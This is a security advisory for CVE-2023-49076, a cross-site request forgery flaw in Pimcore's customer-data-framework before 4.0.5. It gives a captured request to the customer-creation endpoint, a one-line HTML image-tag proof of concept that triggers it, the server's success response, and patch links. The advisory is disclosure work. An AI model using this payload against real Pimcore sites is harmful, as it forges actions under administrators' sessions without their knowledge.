Headline
CVE-2023-49076: CSRF Leading to create a new customer
Customer-data-framework allows management of customer data within Pimcore. There are no tokens or headers to prevent CSRF attacks from occurring, therefore an attacker could abuse this vulnerability to create new customers. This issue has been patched in version 4.0.5.
Package
composer pimcore/customer-data-framework (Composer)
Affected versions
< 4.0.5
Impact
After Navigating to the Customers section of Pimcore application.
Upon clicking on New Customer the following HTTP GET request will be submitted:
GET /admin/customermanagementframework/customers/new HTTP/1.1 Host: demo.pimcore.fun Cookie: PHPSESSID=7a4c4ceddbbb3809dab7852fa60713c6; _pc_vis=ce525cb79e817973; _pc_ses=1695307137653 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close
As you can see, there isn’t any token or header to prevent CSRF attacks from occuring, therefore an attacker could abuse this vulnerability to create new customers !
Proof of Concept
// PoC.js <!DOCTYPE html> <html> <head> <title>CSRF PoC</title> </head> <body> <img src="https://demo.pimcore.fun/admin/customermanagementframework/customers/new"> </body> </html>
A successful HTTP response will be received:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 26
X-Header: <value>
{"success":true,"id":1191}
Impact: Creating new customer on behalf of the admin which affects admin’s integrity !
Patches
Apply https://github.com/pimcore/customer-data-framework/commit/ef7414415cfa64189b8433eff0aa2a9b537a89f7.patch manually.
Workarounds
Update to version 4.0.5 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/ef7414415cfa64189b8433eff0aa2a9b537a89f7.patch